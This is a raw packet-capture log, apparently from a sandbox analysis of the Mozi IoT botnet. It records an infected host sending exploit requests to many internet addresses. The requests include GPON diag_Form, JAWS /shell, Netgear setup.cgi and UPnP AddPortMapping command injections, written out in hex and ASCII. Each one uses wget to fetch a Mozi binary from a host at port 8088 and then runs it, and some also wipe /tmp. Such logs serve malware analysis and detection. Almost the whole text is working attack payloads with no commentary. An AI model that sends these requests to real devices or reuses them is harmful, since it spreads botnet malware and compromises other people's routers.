                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        11192.168.2.2034684203.146.142.20280
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:35.786518097 CET415OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:58:36.373508930 CET415OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:58:37.153589964 CET425OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 203.146.142.202:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:58:37.968555927 CET426INHTTP/1.1 403 Forbidden
                                                                                                        Date: Wed, 06 Jan 2021 13:58:37 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 214
                                                                                                        Keep-Alive: timeout=15, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.<br /></p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        12192.168.2.2036646104.238.159.3380
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:38.155071020 CET427OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:58:38.195677042 CET427INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Server: Apache/2.2.15 (CentOS)
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                                                                                                        Jan 6, 2021 14:58:38.195785999 CET428INHTTP/1.1 400 Bad Request
                                                                                                        Date: Wed, 06 Jan 2021 13:58:38 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 150
                                                                                                        Connection: close
                                                                                                        Server: Apache/2.2.15 (CentOS)
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        13192.168.2.203492614.250.195.17049152
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:49.789874077 CET484OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                        Host: 14.250.195.170:49152
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 2f 74 6d 70 2f 4d 6f 7a 69 2e 6d 20 64 6c 69 6e 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 36 33 34 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 35 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 53 4f 41 50 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 45 4e 56 3a 65 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                        Jan 6, 2021 14:58:50.034817934 CET485INHTTP/1.1 500 Internal Server Error
                                                                                                        CONTENT-LENGTH: 412
                                                                                                        CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                        DATE: Wed, 06 Jan 2021 20:56:45 GMT
                                                                                                        EXT:
                                                                                                        SERVER: Linux/3.0.8, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                        X-User-Agent: redsonic
                                                                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 0a 3c 73 3a 42 6f 64 79 3e 0a 3c 73 3a 46 61 75 6c 74 3e 0a 3c 66 61 75 6c 74 63 6f 64 65 3e 73 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 0a 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 55 50 6e 50 45 72 72 6f 72 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 0a 3c 64 65 74 61 69 6c 3e 0a 3c 55 50 6e 50 45 72 72 6f 72 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 63 6f 6e 74 72 6f 6c 2d 31 2d 30 22 3e 0a 3c 65 72 72 6f 72 43 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 43 6f 64 65 3e 0a 3c 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 49 6e 76 61 6c 69 64 20 41 63 74 69 6f 6e 3c 2f 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 0a 3c 2f 55 50 6e 50 45 72 72 6f 72 3e 0a 3c 2f 64 65 74 61 69 6c 3e 0a 3c 2f 73 3a 46 61 75 6c 74 3e 0a 3c 2f 73 3a 42 6f 64 79 3e 0a 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0a
                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        14192.168.2.204836054.164.156.19180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:52.663357973 CET504OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 54.164.156.191:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:58:52.789906025 CET505INHTTP/1.1 503 Service Unavailable: Back-end server is at capacity
                                                                                                        Content-Length: 0
                                                                                                        Connection: keep-alive


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        15192.168.2.2050064107.20.106.25180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:55.687509060 CET510OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:55.926536083 CET512INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:55 GMT
                                                                                                        Server: Apache
                                                                                                        X-Powered-By: PHP/7.4.9
                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                        Link: <http:/wp-json/>; rel="https://api.w.org/"
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Vary: Cookie
                                                                                                        Cache-Control: s-maxage=10
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 52 41 56 45 4c 4c 49 4e 47 4d 4f 56 45 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 52 41 56 45 4c 4c 49 4e 47 4d 4f 56 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 52 41 56 45 4c 4c 49 4e 47 4d 4f 56 45 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 0a 09 20 20 20 20 22 40 63 6f 6e 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 0a 09 20 20 20 20 22 40 67 72 61 70 68 22 3a 20 5b 0a 09 20 20 20 20 20 20 20 20 7b 0a 09 20 20 20 20 20 20 20 20 20 20 20 20 22 40 74 79 70 65 22 3a 20 22 57 65 62 53 69 74 65 22 2c 0a 09 20 20 20 20 20 20 20 20 20 20 20 20 22 40 69 64 22 3a 20 22 68 74 74 70 73 3a 2f 2f 31 30 37 2e 32 30 2e 31 30 36 2e 32 35 31 2f 23 77 65 62 73 69 74 65 22 2c 0a 09 20 20 20 20 20 20 20 20 20 20 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 31 30 37 2e 32 30 2e 31 30 36 2e 32 35 31 2f 22 2c 0a 09 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 54 52 41 56 45 4c 4c 49 4e 47 4d 4f 56 45 22 2c 0a 09 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 45 58 50 45 52 49 45 4e 43 45 20 54 48 45 20 45 58 43 49 54 45 4d 45 4e 54 21 22 2c 0a 09 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: <!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11">... This site is optimized with the Yoast SEO plugin v15.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - TRAVELLINGMOVE</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - TRAVELLINGMOVE" /><meta property="og:site_name" content="TRAVELLINGMOVE" /><script type="application/ld+json" class="yoast-schema-graph">{ "@context": "https://schema.org", "@graph": [ { "@type": "WebSite", "@id": "https://107.20.106.251/#website", "url": "https://107.20.106.251/", "name": "TRAVELLINGMOVE", "description": "EXPERIENCE THE EXCITEMENT!",


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        16192.168.2.2052998116.206.55.14252869
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:56.748678923 CET544OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:57.226623058 CET545OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
